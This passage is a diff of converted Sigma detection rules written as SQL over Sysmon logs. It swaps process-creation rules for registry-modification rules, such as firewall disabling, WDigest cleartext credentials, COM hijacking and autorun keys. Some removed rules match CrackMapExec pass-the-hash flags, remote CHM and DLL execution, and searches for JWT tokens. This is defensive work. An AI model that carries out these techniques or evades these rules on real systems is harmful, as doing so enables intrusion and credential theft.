Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", - "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.001" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Use of Squirrel.exe", - "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (Details = ''))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of Setres" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", - "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1070" + "attack.t1112" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "New printer port install on host" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", - "status": "test", - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", + "status": "experimental", + "description": "Detects modification of autostart 